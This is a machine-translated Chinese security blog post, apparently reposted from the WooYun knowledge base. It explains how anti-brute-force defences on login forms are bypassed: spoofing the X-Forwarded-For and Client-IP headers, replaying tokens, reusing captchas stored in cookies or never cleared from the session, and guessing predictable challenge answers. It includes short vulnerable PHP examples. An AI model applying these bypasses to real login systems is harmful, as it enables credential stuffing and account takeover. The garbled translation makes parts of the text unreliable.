当前位置:网站首页>Protection and bypass of repeated contracting

Protection and bypass of repeated contracting

2022-06-11 04:04:00 Sword-heart

0x00. Preface

At present, the main problems caused by repeated contract awarding are collision with the library , Blasting, etc . And with more and more password leaks , The impact of such problems is becoming more and more serious , Then most websites have made protection against repeated contracting . But there are also some imperfect protection , You can bypass .

0x01. be based on IP The protection of

Many web sites are trying to avoid the problem of repeated contracting , Limits every one of them ip The number of attempts , If you fail n After the first time ip Temporarily restrict the use of this function .

Most of the php Access to websites ip Both with $_SERVER[‘HTTP_X_FORWARD_FRO’] and $_SERVER[‘HTTP_CLIENT_IP’] of ( Just order php....). See these two variables , Everyone will think of http The head of the X-Forward-For and client_ip. thus it can be seen , We can use it in http The header modifies these two parameters to bypass .

http://zone.wooyun.org/content/12716

0x02. be based on token The protection of

  1. token stay cookie in If token be based on cookie, because cookie User controllable , So such protection is meaningless .

  2. token stay session in

    token stay session It can also be divided into two cases .

    A kind of token Not modified , That is, every time you submit data token Will not change , In this case, there is no protection capability .

The other is to submit once ,token Refresh once , The code looks like this .

1

2

3

4

5

6

7

8

9

10

11

12

<code>#!php

if($_SESSION['token']==$_POST['token']){

      refreshToken();

      if(isUser($_POST['username'],$_POST['password'])){

          echo ' Login successful ';

      }else{

          echo ' Wrong account number or password ';

      }

}else{

      echo 'token error ';

}

</code>

In this case , We can not directly carry out repeated contracting . But due to the token Need to carry out post Submit , So you can match the web page form Medium token, And then carry out combined contracting .

0x03 Protection based on verification code

1 Verification code exists cookie in

Some websites write the value of the verification code in cookie in . Just enter the correct verification code once , Then grab the bag and blast it .

for example ESPCMS cookie Medium ecisp_home_seccode

2 Verification code exists session in

Some programmers use the verification code , Do not refresh after the verification code is judged .

The code looks like this :

1

2

3

4

5

6

7

8

9

10

11

<code>#!php

if($_SESSION['seccode']==$_POST['seccode']){

        if(isUser($_POST['username'],$_POST['password'])){

        echo ' Login successful ';

    }else{

        echo ' Wrong account number or password ';

    }

}esle{

        echo ' Verification code error ';

}

</code>

In this case , We only need to fill in the correct verification code once to capture packets , Then you can directly repeat the contract .

in addition , Most of the $_SESSION['seccode'] Are assigned by the page that generates the verification code , But some programmers are wrong $_SESSION['sescode'] The value of is null .

In this case , We can bypass .

cookies Empty , open burp, Then open the login page , Then, the request to obtain the verification code is sent directly drop fall , In this case, our $_SESSION['seccode'] It's empty . Then grab the bag and blast it directly .

http://wooyun.org/bugs/wooyun-2014-080424

3 The verification code can directly identify

I won't say much about this , Dark clouds are an example .

http://zone.wooyun.org/content/11826

4 Verification code design defect

The design of verification code has defects , A specific value can be generated by some condition .

http://wooyun.org/bugs/wooyun-2014-080211

0x04. Protection based on predictable values

Give examples of several common situations

  1. By answering the assigned questions , To verify that . Common websites have domain names , Website titles and so on . Because the randomness is too weak , So we can set it as the answer to a question , Then blast it . And more directly , Directly in the page so output The domain name of our website is ( The answer for xxx.com), In this case, it is similar to 2.2 How to get around .

  2. 1+1 3+1 And so on .

  3. Some websites will let you write down the numerical value or letter of a feature in the graph . In this way, the randomness of the verification code is reduced . For example, the verification code is sx4g Number in . The number is only 10 individual , We just set one of them as a fixed value for testing . The main reason for this problem is that the value or range of values can be predicted , We can set a fixed value as the answer , Then test .

This article comes from the dark cloud knowledge base , The copyright of this article belongs to Wuyun knowledge base !

原网站

版权声明
本文为[Sword-heart]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/162/202206110342123084.html

边栏推荐

猜你喜欢

随机推荐